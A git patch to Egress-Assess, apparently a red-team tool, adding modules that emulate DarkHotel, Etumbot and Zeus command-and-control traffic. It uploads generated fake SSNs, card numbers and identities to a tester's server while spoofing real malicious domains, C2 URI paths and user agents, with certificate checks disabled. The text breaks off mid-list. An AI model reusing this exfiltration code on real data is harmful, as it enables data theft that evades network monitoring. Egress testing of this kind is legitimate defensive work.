From cbe3fcc0f43b7cd8ddc9b4986ea2a232ab8db983 Mon Sep 17 00:00:00 2001 From: Chris Truncer Date: Mon, 16 Nov 2015 07:42:26 -0700 Subject: [PATCH] Merge of our malware modules into Egress-Assess --- Egress-Assess.py | 46 + Invoke-EgressAssess.ps1 => EgressAssess.ps1 | 1483 +++++++++++++---- commandcontrol/__init__.py | 0 commandcontrol/apt/__init__.py | 0 commandcontrol/apt/darkhotel.py | 89 + commandcontrol/apt/etumbot.py | 96 ++ commandcontrol/apt/putterpanda.py | 108 ++ commandcontrol/malware/__init__.py | 0 commandcontrol/malware/zeus.py | 279 ++++ common/helpers.py | 21 +- common/orchestra.py | 15 +- protocols/clients/https_client.py | 10 - .../servers/serverlibs/web/base_handler.py | 97 +- .../serverlibs/web/malware_callbacks.py | 208 +++ 14 files changed, 2076 insertions(+), 376 deletions(-) rename Invoke-EgressAssess.ps1 => EgressAssess.ps1 (92%) create mode 100644 commandcontrol/__init__.py create mode 100644 commandcontrol/apt/__init__.py create mode 100644 commandcontrol/apt/darkhotel.py create mode 100644 commandcontrol/apt/etumbot.py create mode 100644 commandcontrol/apt/putterpanda.py create mode 100644 commandcontrol/malware/__init__.py create mode 100644 commandcontrol/malware/zeus.py create mode 100644 protocols/servers/serverlibs/web/malware_callbacks.py diff --git a/Egress-Assess.py b/Egress-Assess.py index ab1e62d..286077b 100755 --- a/Egress-Assess.py +++ b/Egress-Assess.py @@ -48,8 +48,31 @@ if __name__ == "__main__": print sys.exit() + elif cli_parsed.list_actors: + print "[*] Supported malware/APT groups: \n" + the_conductor.load_actors(cli_parsed) + for name, datatype_module in the_conductor.actor_modules.iteritems(): + print "[+] " + datatype_module.cli + " - (" +\ + datatype_module.description + ")" + print + sys.exit() + if cli_parsed.server is not None: the_conductor.load_server_protocols(cli_parsed) + the_conductor.load_actors(cli_parsed) + + # Check if server module is given threat actor vs. normal server + for actor_path, actor_mod in the_conductor.actor_modules.iteritems(): + + # If actor module is what is used, search for the server requirement + # and load that + if actor_mod.cli == cli_parsed.server.lower(): + + for full_path, server_actor in the_conductor.server_protocols.iteritems(): + + if server_actor.protocol.lower() == actor_mod.server_requirement: + server_actor.serve() + for full_path, server in the_conductor.server_protocols.iteritems(): @@ -86,3 +109,26 @@ if __name__ == "__main__": print "[*] Error: You either didn't provide a valid datatype or client protocol to use." print "[*] Error: Re-run and use --list-datatypes or --list-clients to see possible options." sys.exit() + + elif cli_parsed.actor is not None: + # Load different threat actors/malware + the_conductor.load_actors(cli_parsed) + + # Identify the actor to emulate + for full_path, actor_variant in the_conductor.actor_modules.iteritems(): + if actor_variant.cli == cli_parsed.actor.lower(): + + # Check if generating data or using data within the actor module + if cli_parsed.datatype is not None: + the_conductor.load_datatypes(cli_parsed) + + # Generate the data for the actor to exfil + for name, datatype_module in the_conductor.datatypes.iteritems(): + if datatype_module.cli == cli_parsed.datatype.lower(): + generated_data = datatype_module.generate_data() + + actor_variant.emulate(data_to_exfil=generated_data) + + # Instead, use the exfil data within the module + else: + actor_variant.emulate() diff --git a/Invoke-EgressAssess.ps1 b/EgressAssess.ps1 similarity index 92% rename from Invoke-EgressAssess.ps1 rename to EgressAssess.ps1 index 2be94f5..8e87617 100644 --- a/Invoke-EgressAssess.ps1 +++ b/EgressAssess.ps1 @@ -1,10 +1,10 @@ function Invoke-EgressAssess { + <# .Synopsis Egress-assess powershell client. - Script created by @rvrsh3ll @christruncer @harmj0y @sixdub .Description This script will connect to an Egress-assess server and transfer faux Personally Identifiable Information or @@ -21,18 +21,24 @@ function Invoke-EgressAssess .Parameter ResolveDNS Switch to enable DNS resolution for ICMP transfers +.Parameter NoPing + Disable ping check + .Parameter Proxy This switch is used when you need to exfiltrate data using the system proxy +.Parameter UserAgent + Assign a specific UserAgent ("IE","Moz","Saf"). Default's to random + +.Parameter Actor + Assign a malware profile to your traffic + .Parameter Username The username for the ftp server .Parameter Password The password for the ftp server -.Parameter NoPing - Disable the server ping check - .Parameter Datatype The string containing the data you want to generate and exfil May contain filepath to transfer file @@ -57,19 +63,23 @@ function Invoke-EgressAssess #> [CmdletBinding()] Param ( - [Parameter(Mandatory = $True)] + [Parameter(Mandatory = $False)] [string]$Client, [Parameter(Mandatory = $True)] [string]$IP, [Parameter(Mandatory = $False)] [switch]$ResolveDNS, [Parameter(Mandatory = $False)] + [switch]$NoPing, + [Parameter(Mandatory = $False)] [switch]$Proxy, + [Parameter(Mandatory = $False)] + [string]$UserAgent, + [Parameter(Mandatory = $False)] + [string]$Actor, [Parameter(Mandatory = $True, ValueFromPipeline = $True)] [string]$Datatype, [Parameter(Mandatory = $False)] - [switch]$NoPing, - [Parameter(Mandatory = $False)] [string]$Username, [Parameter(Mandatory = $False)] [string]$Password, @@ -80,32 +90,31 @@ function Invoke-EgressAssess [Parameter(Mandatory = $False)] [string]$Report ) - begin { #stop looping errors $ErrorActionPreference = "Stop" - + #get start time $startTime = (Get-Date) - - #checks if Egress-Assess server is running + + #checks if Egress-Assess server is running using ICMP ping function Test-ServerConnection { Write-Verbose "[*] Testing server connection" $socketTcp = New-Object Net.Sockets.TcpClient - $socketUdp = New-Object System.Net.Sockets.UdpClient + $socketUdp = New-Object System.Net.Sockets.UdpClient $ping = $(Test-Connection -ComputerName $IP -Count 1 -Quiet) - if($ping -eq $true) + if ($ping -eq $true) { Write-Verbose "[*] Server is UP on $IP." - if($client -eq "icmp") - { + if ($client -eq "icmp") + { #Potential future verification of icmp server/sniffer running Write-Verbose "[*] ICMP server *possibly* running." Return } - elseif($client -eq "dnstxt" -or $client -eq "dnsresolved") + elseif ($client -eq "dnstxt" -or $client -eq "dnsresolved") { <#Note: Need to troubleshoot DNS checks more. $port = 53 @@ -130,19 +139,19 @@ function Invoke-EgressAssess } else { - if($client -eq "http") + if ($client -eq "http") { $port = 80 } - elseif($client -eq "https") + elseif ($client -eq "https") { $port = 443 } - elseif($client -eq "ftp") + elseif ($client -eq "ftp") { $port = 21 } - elseif($client -eq "sftp") + elseif ($client -eq "sftp") { $port = 22 } @@ -150,24 +159,31 @@ function Invoke-EgressAssess { $port = 25 } - elseif($client -eq "smb") + elseif ($client -eq "smb") { $port = 445 } - else + else { Write-Verbose "[*] Protocol not available." throw "Error" } - + #attempt to test connection to TCP ports try { - $socketTcp.Connect($ip,$port) - } catch{} - + $socketTcp.Connect($ip, $port) + } + catch + { + $ErrorMessage = $_.Exception.Message + Write-Verbose "[*] Error, tranfer failed with error:" + Write-Verbose $ErrorMessage + Break + } + #connect to server if running - if($socketTcp.Connected) + if ($socketTcp.Connected) { Write-Verbose "[*] $($client.toUpper()) Server Running on $IP port $port." $socketTcp.close() @@ -177,13 +193,13 @@ function Invoke-EgressAssess Write-Verbose "[*] $($client.toUpper()) Server Not Running on $IP. Start server." throw "Error" } - } + } } - else + else { Write-Verbose "[*] Server is DOWN on $IP." throw "Error" - } + } } @@ -212,6 +228,7 @@ function Invoke-EgressAssess function Generate-CreditCards { + $script:AllCC = @() $stringBuilder = New-Object System.Text.StringBuilder $script:list = New-Object System.Collections.Generic.List[System.String] @@ -264,8 +281,9 @@ function Invoke-EgressAssess } $script:AllCC = $list.ToArray() } - - function Generate-Names { + + function Generate-Identity + { $script:AllNames = @() $FirstNames = @('michael', 'john', 'david', 'chris', 'mike', 'james', 'mark', 'jason', 'robert', 'jessica', 'sarah', 'jennifer', @@ -275,7 +293,7 @@ function Invoke-EgressAssess 'mary', 'adam', 'melissa', 'matthew', 'nick', 'stephanie', 'anthony', 'tom', 'josh', 'laura', 'tim', 'jim', 'amy', 'peter', 'dan', 'nicole', 'tony') - + $LastNames = @('smith', 'johnson', 'jones', 'williams', 'brown', 'lee', 'khan', 'singh', 'kumar', 'miller', 'davis', 'wilson', 'taylor', 'thomas', 'garcia', 'anderson', 'sharma', 'martin', @@ -284,7 +302,7 @@ function Invoke-EgressAssess 'hernandez', 'clark', 'lewis', 'robinson', 'young', 'gonzalez', 'hall', 'wright', 'scott', 'perez', 'green', 'allen', 'tan', 'shah', 'roberts', 'adams', 'nguyen', 'james', 'hill') - + $Addresses = @('PO Box 4927 Montgomery, AL 36103', 'PO Box 110801 Juneau, AK 99811-0801', '1110 W. Washington Street, Suite 155 Phoenix, AZ 85007', 'One Capitol Mall Little Rock, AR 72201', @@ -327,8 +345,7 @@ function Invoke-EgressAssess '110 3rd Street Lenoir, NC 28645', '488 Schoolhouse Lane Johnston, RI 02919', '658 Market Street New Brunswick, NJ 08901') - - + $list = New-Object System.Collections.Generic.List[System.String] $num = [math]::Round(($Size * 1MB)/69) $percentcount = 0 @@ -341,14 +358,14 @@ function Invoke-EgressAssess Write-Verbose "$percent% Done! $i Name-Sets Generated" $percentcount += 1 } - $First = Get-Random -InputObject $FirstNames - $Last = Get-Random -InputObject $LastNames - $Address = Get-Random -InputObject $Addresses - $SSN = "$(Get-Random -minimum 100 -maximum 999)-$(Get-Random -minimum 10 -maximum 99)-$(Get-Random -minimum 1000 -maximum 9999)" - $TextInfo = (Get-Culture).TextInfo - $r = "$($TextInfo.ToTitleCase($First.ToLower()) + " " + $TextInfo.ToTitleCase($Last.ToLower()) + " $Address" + " $SSN")" - $s = Get-Random -InputObject $r - $list.Add($s) + $First = Get-Random -InputObject $FirstNames + $Last = Get-Random -InputObject $LastNames + $Address = Get-Random -InputObject $Addresses + $SSN = "$(Get-Random -minimum 100 -maximum 999)-$(Get-Random -minimum 10 -maximum 99)-$(Get-Random -minimum 1000 -maximum 9999)" + $TextInfo = (Get-Culture).TextInfo + $r = "$($TextInfo.ToTitleCase($First.ToLower()) + " " + $TextInfo.ToTitleCase($Last.ToLower()) + " $Address" + " $SSN")" + $s = Get-Random -InputObject $r + $list.Add($s) } $script:AllNames = $list.ToArray() } @@ -358,22 +375,721 @@ function Invoke-EgressAssess $global:FileTransfer = $True if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } } - - function Use-HTTP + ################################### + # Begin Malware Signatures # + ################################### + function Use-DarkHotel { + $domains = @('micronaoko.jumpingcrab.com', 'microchsse.strangled.net', + 'microbrownys.strangled.net', 'microplants.strangled.net', + 'microlilics.crabdance.com') + $uris = @('/bin/read_i.php?a1=step2-down-b&a2=KJNSDFkjmdfH&a3=SW5mb1N5c0BVc2VyIE1ZQ09NUFVURVJATXlVc2VyICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTMtMTY2N1UgQ1BVIEAgMTYwMEdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgWFAgKFNlcnZpY2UgUGFjayAzKU5ldCBjYXJkIDogMTkyLjE2OC4wLjIgKDEzMzc3MzMxMTMzNyk=&a4=KS', + '/bin/read_i.php?a1=step2-down-r&a2=KDYEMDYWM&a3=SW5mb1N5c0BVc2VyIE1ZQ09NUFVURVJATXlVc2VyICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTctMTY2N1UgQ1BVIEAgMTYwMEdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgNyAoU2VydmljZSBQYWNrIDIpTmV0IGNhcmQgOiAxOTIuMTY4LjI1LjIgKDEzMzc3MzMxMTMzNyk=&a4=TR', + '/bin/read_i.php?a1=step2-down-u&a2=YEMDGEJEIMD&a3=SW5mb1N5c0BVc2VyIFdvcmtzdGF0aW9uQFNvbm9mRmx5bm4gKDA4NTApQyBQIFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy0xNTBVIENQVSBAIDE2MDBHSHpTeXN0ZW0gT1M6IE1pY3Jvc29mdCBXaW5kb3dzIDguMSAoU2VydmljZSBQYWNrIDEpTmV0IGNhcmQgOiAxOTIuMTY4LjMzLjIgKDEzMzc3MzMxMTMzNyk=&a4=BD', + '/bin/read_i.php?a1=step2-down-c&a2=MSNETJ&a3=SW5mb1N5c0BVc2VyIFNFUlZFUkRDQEFETUlOICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTctOTBVIENQVSBAIDIwMDBHSHpTeXN0ZW0gT1M6IE1pY3Jvc29mdCBXaW5kb3dzIDEwIE5ldCBjYXJkIDogMTkyLjE2OC4xMzMuMiAoMTMzNzczMzExMzM3KQ==&a4=AST', + '/bin/read_i.php?a1=step2-down-k&a2=VSEJKNEF&a3=SW5mb1N5c0BVc2VyIERCQURCQFNZU0RCQSAoMDg1MClDUFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy05MCBDUFUgQCAzMjAwR0h6U3lzdGVtIE9TOiBNaWNyb3NvZnQgV2luZG93cyBTZXJ2ZXIgMjAwMyBOZXQgY2FyZCA6IDE5Mi4xNjguMTUzLjIgKDEzMzc3MzMxMTMzNyk=&a4=NOD' + '/bin/read_i.php?a1=step2-down-j&a2=ALFDOEJNKF&a3=SW5mb1N5c0BVc2VyIERBZG1pbkBEQ1N5cyAoMDk1MClDUFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy05MDAgQ1BVIEAgMzgwMUdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgU2VydmVyIDIwMDggTmV0IGNhcmQgOiAxOTIuMTY4LjE5My4yICgxMzM3NzMzMTEzMzcp&a4=NV') + $checkinDomains = @('autolace.twilightparadox.com', 'automachine.servequake.com') + + # Detect what datatype we're sending if ($Datatype -contains "ssn" -or "cc" -or "identity") { - $totalupload = 0 - if ($Datatype -eq "ssn") { + + if ($Datatype -eq "ssn") + { Generate-SSN $Data = $AllSSN } - elseif ($Datatype -eq "cc") { + elseif ($Datatype -eq "cc") + { Generate-CreditCards $Data = $AllCC } - elseif ($Datatype -eq "identity") { - Generate-Names + elseif ($Datatype -eq "identity") + { + Generate-Identity + $Data = $AllNames + } + + } + else + { + Write-Verbose "[*] You did not provide a data type to generate." + Return + } + Do + { + try + { + Try + { + # Checkin Request 1 + + if ($client -eq "http") + { + $Url = "http://" + $IP + "/major/images/view.php" + } + elseif ($client -eq "https") + { + $Url = "https://" + $IP + "/major/images/view.php" + } + $ranHost = Get-Random -InputObject $checkinDomains + [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } + $uri = New-Object -TypeName System.Uri -ArgumentList $Url + $wc = New-Object -TypeName System.Net.WebClient + Write-Verbose $uri + $wc.Headers.Add('Accept', '*/*') + $wc.Headers.Add('User-Agent', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)') + $wc.Headers.Add('Host', $ranHost) + $wc.Headers.Add('Pragma', 'no-cache') + Write-Verbose "Uploading data..." + $wc.UploadString($uri, $Data) + } + catch + { + $ErrorMessage = $_.Exception.Message + Write-Verbose "[*] Error, tranfer failed with error:" + Write-Verbose $ErrorMessage + Break + } + + # Checkin Request 2 + if ($client -eq "http") + { + $Url = "http://" + $IP + "/major/txt/read.php" + } + elseif ($client -eq "https") + { + $Url = "https://" + $IP + "/major/txt/read.php" + } + $ranHost = Get-Random -InputObject $checkinDomains + [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } + $uri = New-Object -TypeName System.Uri -ArgumentList $Url + $wc = New-Object -TypeName System.Net.WebClient + Write-Verbose $uri + $wc.Headers.Add('Accept', '*/*') + $wc.Headers.Add('User-Agent', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)') + $wc.Headers.Add('Host', $ranHost) + $wc.Headers.Add('Pragma', 'no-cache') + Write-Verbose "Uploading data..." + $wc.UploadString($uri, $Data) + } + catch + { + $ErrorMessage = $_.Exception.Message + Write-Verbose "[*] Error, tranfer failed with error:" + Write-Verbose $ErrorMessage + Break + } + # Main transfer + $localLoop = 5 + Do + { + $ranURI = Get-Random -InputObject $uris + if ($client -eq "http") + { + $Url = "http://" + $IP + $ranURI + } + elseif ($client -eq "https") + { + $Url = "https://" + $IP + $ranURI + } + $ranHost = Get-Random -InputObject $checkinDomains + [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } + $uri = New-Object -TypeName System.Uri -ArgumentList $Url + $wc = New-Object -TypeName System.Net.WebClient + Write-Verbose $uri + $wc.Headers.Add('Accept', '*/*') + $wc.Headers.Add('User-Agent', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)') + $wc.Headers.Add('Host', $ranHost) + $wc.Headers.Add('Pragma', 'no-cache') + Write-Verbose "Uploading data..." + $wc.UploadString($uri, $Data) + $localLoop-- + } + While ($localLoop -gt 0) + + Write-Verbose "[*] Transfer complete!" + $loops-- + Write-Verbose "[*] $loops loops remaining.." + } + While ($loops -gt 0) + } + + function Use-Etumbot + { + $domains = @('200.27.173.58', '200.42.69.140', '92.54.232.42', '133.87.242.63', + '98.188.111.244', 'intro.sunnyschool.com.tw', '143.89.145.156', + '198.209.212.82', '143.89.47.132', '196.1.199.15', + 'wwap.publiclol.com', '59.0.249.11', '190.16.246.129', '211.53.164.152', 'finance.yesplusno.com') + $encodedString = @('dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ--', + 'Y2F0Y2hldHVtYm90aWZ5b3VjYW4-', + 'Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24-', + 'bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA--', + 'd2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw-', + 'U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl', + 'dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM-', + 'bm90cmVkYW1lY2hlYXRzdG93aW4-', + 'dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l', + 'YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy') + $uris = @($("/image/" + $(Get-Random -InputObject $encodedString) + ".jpg"), + $("/history/" + $(Get-Random -InputObject $encodedString) + ".asp"), + $("/manage/asp/item.asp?id=" + $(Get-Random -InputObject $encodedString) + "&&mux=" + $(Get-Random -InputObject $encodedString)), + $("/article/30441/Review.asp?id=" + $(Get-Random -InputObject $encodedString) + "&&date=" + $(Get-Random -InputObject $encodedString)), + $("/tech/s.asp?m=" + $(Get-Random -InputObject $encodedString))) + + # Detect what datatype we're sending + if ($Datatype -contains "ssn" -or "cc" -or "identity") + { + + if ($Datatype -eq "ssn") + { + Generate-SSN + $Data = $AllSSN + } + elseif ($Datatype -eq "cc") + { + Generate-CreditCards + $Data = $AllCC + } + elseif ($Datatype -eq "identity") + { + Generate-Identity + $Data = $AllNames + } + + } + else + { + Write-Verbose "[*] You did not provide a data type to generate." + Return + } + Do + { + # Checkin Request + if ($client -eq "http") + { + $Url = "http://" + $IP + "/home/index.asp?typeid=13" + } + elseif ($client -eq "https") + { + $Url = "https://" + $IP + "/home/index.asp?typeid=13" + } + $ranHost = Get-Random -InputObject $domains + [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } + $uri = New-Object -TypeName System.Uri -ArgumentList $Url + $wc = New-Object -TypeName System.Net.WebClient + Write-Verbose $uri + $wc.Headers.Add('Accept', 'text/html,application/xhtml+xml,application/xml,q=0.9,*/*;q=0.8') + $wc.Headers.Add('User-Agent', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)') + $wc.Headers.Add('Host', $ranHost) + $wc.Headers.Add('Referrer', 'http://www.google.com') + $wc.Headers.Add('Cache-Control', 'no-cache') + $wc.Headers.Add('Pragma', 'no-cache') + Write-Verbose "Uploading data..." + $wc.UploadString($uri, $Data) + + + # Main transfer + $localLoop = 5 + Do + { + Write-Verbose "Looping 5 times" + + $ranURI = Get-Random -InputObject $uris + if ($client -eq "http") + { + $Url = "http://" + $IP + $ranURI + } + elseif ($client -eq "https") + { + $Url = "https://" + $IP + $ranURI + } + $ranHost = Get-Random -InputObject $domains + [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } + $uri = New-Object -TypeName System.Uri -ArgumentList $Url + $wc = New-Object -TypeName System.Net.WebClient + Write-Verbose $uri + $wc.Headers.Add('Accept', 'text/html,application/xhtml+xml,application/xml,q=0.9,*/*;q=0.8') + $wc.Headers.Add('User-Agent', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)') + $wc.Headers.Add('Host', $ranHost) + $wc.Headers.Add('Referrer', 'http://www.google.com') + $wc.Headers.Add('Cache-Control', 'no-cache') + $wc.Headers.Add('Pragma', 'no-cache') + Write-Verbose "Uploading data..." + $wc.UploadString($uri, $Data) + $localLoop-- + } + While ($localLoop -gt 0) + + + Write-Verbose "[*] Transfer complete!" + $loops-- + Write-Verbose "[*] $loops loops remaining.." + } + While ($loops -gt 0) + } + ## End Eumbot + + function Use-Zeus + { + $domains = @('0x.x.gg', '6pjddrtt7.com', 'apexholdngs.com', 'baoshlda.com', + 'bestdove.in.ua', 'championbft.com', 'codedtunes.zapto.org', + 'cooldomainname.ws', 'danislenefc.info', 'dau43vt5wtrd.tk', + 'diosdelared.com.mx', 'emaillifecoaching.com.au', 'emekonline.tk', + 'eresimgbo.com', 'escoesco.info', 'fileserver03.com', + 'finsolutions.top', 'fronty2073.net', 'genmjob3.ru', + 'gjiayimeiya.com', 'gorainbowzone.tk', 'hope-found-now.net', + 'hruner.com', 'hui-ain-apparel.tk', 'ice.ip64.net', + 'interglobalswiss.info', 'jomo.in.ua', 'juyteche.tk', + 'kesikelyaf.com', 'legitvendors.ru', 'lion.web2.0campus.net', + 'liveresellerweb.eu', 'mccc-investconsultant.com', 'muazymaur.tk', + 'mymytonnymaxltd.org', 'mypic.hopto.org', 'mystartap.com', + 'neease.com', 'ns513726.ip-192-99-148.net', + 'panel.vargakragard.se', 'polyaire-au.com', + 'projects.globaltronics.net', 'regame.su', 'richus.ru', + 'server.bovine-mena.com', 'ssl.sinergycosmetics.com', + 'sslsam.com', 'sus.nieuwmoer.info', 'tesab.org.uk', + 'up.frigo2000.it', 'update.odeen.eu', 'update.rifugiopontese.it', + 'urchilaa.com', 'winscoft.com', 'www.nikey.cn', + 'www.riverwalktrader.co.za', 'www.witkey.com', 'zabava-bel.ru') + $uris = @('/jm32/includes/site/bot.exe', '/jm32/includes/site/config.bin', + '/jm32/includes/site/gate.php', '/mathew/config.jpg', + '/docs/.docs/config.jpg', '/docs/.docs/do.php', + '/zeujuus/a/gate.php', '/zeujuus/a/modules/bot.exe', + '/zeujuus/a/modules/config.bin', + '/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php', + '/zejius/2HZG41Zw/bot.exe', + '/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin', + '/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php', + '/zejius/5GPR0iy9/bot.exe', + '/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin', '/past/config.jpg', + '/past/gate.php', '/fan/base/config.jpg', + '/wp-includes/pomo/panel/config.jpg', + '/wp-includes/pomo/panel/gate.php', '/themes/panel/config.jpg', + '/themes/panel/gate.php', '/home/libraries/joomla/php/gate.php', + '/home/plugins/system/tmp/bot.scr', + '/home/plugins/system/tmp/config.bin', + '/home/plugins/system/tmp/gate.php', '/js/ssj/config.jpg', + '/js/ssj/gate.php', '/site/tmp/xml/config.jpg', + '/site/tmp/xml/gate.php', '/news/wpg.php', '/file.php', + '/.cgi-bin./as.bin', '/wp-content/themes/bmw_lab/new.ban', + '/wp-content/themes/bmw_lab/newnew.wav', '/vs/panel/config.jpg', + '/vs/panel/gate.php', '/brand/server/file.php', + '/brand/server/gate.php', + '/wp-admin/css/colors/sunrise/admin/bot.exe', + '/wp-admin/css/colors/sunrise/admin/config.bin', + '/wp-admin/css/colors/sunrise/admin/secure.php', + '/wp-content/themes/chagim/library/images/plates/bot.exe', + '/wp-content/themes/chagim/library/images/plates/config.bin', + '/wp-content/themes/chagim/library/images/plates/gate.php', + '/images/burr_insurance001001.php', '/images/team/config.jpg', + '/images/team/gate.php', '/test/config.jpg', '/test/gate.php', + '/ray/server/file.php', '/ray/server/gate.php', '/capa.bin', + '/capa.exe', '/secure.php', '/ral/30/config.bin', + '/ral/30/secure.php', '/wp-admin/css/config.bin', + '/wp-admin/css/gate.php', '/wp-admin/css/setup.exe', + '/panel/config.jpg', '/panel/gate.php', + '/wp-includes2/SimplePie/Net/page/config.jpg', + '/wp-includes2/SimplePie/Net/page/gate.php', + '/includes/.srv/srv/bot.exe', + '/includes/.srv/srv/config.bin', '/includes/.srv/srv/gate.php', + '/ric/30/config.bin', '/ric/30/secure.php', '/blog/crea.bin', + '/blog/crea.exe', '/blog/secure.php', '/images2/dave.jpg', + '/images2/gate.php', '/wp-includes/ID3/config.jpg', + '/wp-includes/ID3/gate.php', '/emman/panel/config.jpg', + '/emman/panel/gate.php', '/xampp/img/escu.bin', + '/xampp/img/escu.exe', '/xampp/img/secure.php', + '/.css/config.jpg', '/.css/gate.php', '/admin/cfg.bin', + '/admin/gate.php', '/isai/modules/mod_upgrade/bot.exe', + '/isai/modules/mod_upgrade/config.bin', + '/isai/modules/mod_upgrade/gate.php', '/wp-comment/firs.jpg', + '/wp-comment/gate.php', '/panel/file.php', '/panel/gate.php', + '/images01/fong.bin', '/images01/fong.exe', '/images01/gate.php', + '/img/vg.php', '/components/com_file/file.php', + '/components/com_file/gate.php', '/images/panel/config.jpg', + '/images/panel/gate.php', '/wordpress/gate.php', + '/wordpress/gree.jpg', '/media/.tmp/file.php', + '/media/.tmp/gate.php', '/gate.php', '/modules/holl.bin', + '/modules/holl.exe', '/templates/admin/install/config.jpg', + '/templates/admin/install/gate.php', + '/tmp/admin/install/config.jpg', '/tmp/admin/install/gate.php', + '/tmp/cp/config.jpg', '/tmp/cp/gate.php', + '/tmp/install/config.jpg', '/tmp/install/gate.php', + '/frank/panel/config.jpg', '/frank/panel/gate.php', + '/tmp/configs/new/vg.php', '/meask/lite/file.php', + '/meask/lite/gate.php', '/css/src/admin/config.jpg', + '/css/src/admin/gate.php', '/js/admin/install/config.jpg', + '/js/admin/install/gate.php', + '/wp-content/plugins/wp-db-backup-made/work.php', + '/update/bot.exe', '/update/cfg.bin', '/update/gate.php', + '/chopinschumann/ital.bin', '/chopinschumann/ital.exe', + '/chopinschumann/secure.php', '/images/ital.bin', + '/images/ital.exe', '/images/secure.php', + '/compose/panel/bot.exe', '/compose/panel/config.bin', + '/compose/panel/secure.php', '/fy97/panel/config.bin', + '/fy97/panel/secure.php', '/images/joea.bin', '/images/joea.exe', + '/images/secure.php', '/components/com_joomla/plugin/config.jpg', + '/components/com_joomla/plugin/gate.php', + '/resource/css/config.bin', '/resource/css/secure.php', + '/wp-content/upgrade/PANEL/config.jpg', + '/wp-content/upgrade/PANEL/gate.php', + '/wp-content/plugins/bcet56aoikqf52iu/food.php', + '/Scripts/_notes/build/bot.exe', + '/Scripts/_notes/build/config.bin', + '/Scripts/_notes/build/gate.php', '/REMOVED/.pop/bot.exe', + '/REMOVED/.pop/config.bin', '/REMOVED/.pop/gate.php', + '/KINS/panel/bot.exe', '/KINS/panel/config.jpg', + '/KINS/panel/gate.php', '/panel/config.jpg', '/panel/gate.php', + '/walex/files/bot.exe', '/walex/files/config.jpg', + '/walex/files/gate.php', '/e7/bot.exe', '/e7/cfg.bin', + '/e7/gate.php', + '/wp-admin/css/colors/coffee/cat/server/config.jpg', + '/wp-admin/css/colors/coffee/cat/server/gate.php', + '/site/S/13897652/5112/file.php', + '/site/S/13897652/5112/gate.php', + '/images/js/osomo/panel/config.jpg', + '/images/js/osomo/panel/gate.php', + '/themes/panel/config.jp', '/themes/panel/gate.php', + '/system/eusat/telesa/config.jpg', '/sadcxvbv/vdfbffddf.php', + '/wqwcqqw/sasasacw.php', '/images/server/file.php', + '/images/server/gate.php', '/cache/lcitorg/config.bin', + '/cache/lcitorg/gate.php', '/form/panel/config.jpg', + '/form/panel/gate.php', '/backup/gate.php', + '/backup/jera.jpg', '/images/file.php', + '/images/js/panel/config.jpg', '/images/js/panel/gate.php', + '/images/config.jpg', '/images/gate.php', + '/slim-cita/helps/file.php', '/slim-cita/helps/gate.php', + '/kin/panelz/config.jpg', '/kin/panelz/gate.php', + '/image/Panel/config.jpg', '/folder/config.bin', + '/folder/secure.php', '/plugins/panel/config.jpg', + '/plugins/panel/gate.php', + '/wp-content/plugins/slxcdfrdmn9r0x/j7.php', '/q/gate.php', + '/q/outl.jpg', '/media/k2/file.php', '/media/k2/gate.php', + '/js/MOM/config.jpg', '/js/MOM/gate.php', + '/lung/panel/config.jpg', '/wp/config.jpg', + '/wp/gate.php', '/data/config.jpg', '/data/gate.php', + '/templates/beez/bot.exe', '/templates/beez/config.bin', + '/templates/beez/gate.php', '/wp-includes/css/new/config.jpg', + '/wp-includes/css/new/gate.php', + '/language/pdf_fonts/server/bot.exe', + '/language/pdf_fonts/server/config.bin', + '/language/pdf_fonts/server/gate.php', '/js/liscence.php', + '/js/userslogin.php', '/ijo/config.jpg', '/ijo/gate.php', + '/Mix/valeg/bot.exe', '/Mix/valeg/config.bin', + '/Mix/valeg/gate.php', '/media/media/js/.js/ajax.php', + '/media/media/js/.js/color.jpg', '/wpc/Panel/config.jpg', + '/wpc/Panel/gate.php', '/images/gate.php', '/images/stab.jpg', + '/wpadm/Panel/config.jpg', '/wpadm/Panel/gate.php', + '/admin/b7.php', '/admin/file.php', '/amed/config.jpg', + '/amed/gate.php', '/sadcxvbv/vdfbffddf.php', + 